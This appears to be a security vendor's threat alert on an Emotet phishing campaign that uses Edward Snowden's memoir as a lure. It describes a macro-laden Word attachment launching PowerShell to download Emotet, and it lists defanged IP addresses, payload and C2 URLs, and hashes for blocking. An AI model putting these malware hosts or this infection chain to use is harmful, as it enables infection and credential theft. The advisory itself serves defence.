

Rewterz Threat Alert – QNAPCrypt Ransomware New Variant
September 24, 2019
Rewterz Threat Advisory – Multiple vulnerabilities in Adobe ColdFusion
September 25, 2019
Rewterz Threat Alert – QNAPCrypt Ransomware New Variant
September 24, 2019
Rewterz Threat Advisory – Multiple vulnerabilities in Adobe ColdFusion
September 25, 2019Severity
High
Analysis Summary
Emotet recently resumed spear phishing attacks, incorporating the news about NSA whistleblower Edward Snowden’s new book Permanent Record as a lure. The memoir is already on Amazon’s bestseller list. Criminals tend to generate monetary benefits from such newsworthy events for scams and other social engineering purposes. In this particular case, Emotet authors are supposedly offering Snowden’s memoir as a Word attachment. Emails of this phishing campaign were found in English, Italian, Spanish, German and French, as shown below.

When the document is opened, a fake message appears that “Word hasn’t been activated”. When victims click on “Enable Content” appearing with a security warning, a malicious macro code is executed.

The macro triggers a PowerShell command that will retrieve the Emotet malware binary from a compromised WordPress site. After infection, the machine will attempt to reach out to one of Emotet’s many C2s.
Impact
- Credential Theft
- Financial Loss
- Loss of Information
Indicators of Compromise
IP(s) / Hostname(s)
- 178[.]32[.]255[.]133
- 133[.]130[.]73[.]156
- 62[.]75[.]171[.]248
URLs
- http[:]//62[.]75[.]171[.]248[:]7080/chunk/window/ringin/
- http[:]//www[.]cia[.]com[.]py/wp-content/uploads/2019/09/XNFerERN/
Malware Hash (MD5/SHA1/SH256)
- 757b35d20f05b98f2c51fc7a9b6a57ccbbd428576563d3aff7e0c6b70d544975
- 8c540b62bcd2ac90364dd56eb1bb6e46
- 5ab7a5cf290ebf52647771f893a2fa322a9b1891e5a5e54811c500dd290c8477
- b960f1afb95b6f0e53b3fcec2aa54a98
Remediation
- Block the threat indicators at their respective controls.
- Do not download email attachments coming from untrusted sources.
- Do not enable macros/content unless extremely necessary.
- Always scan all files before execution.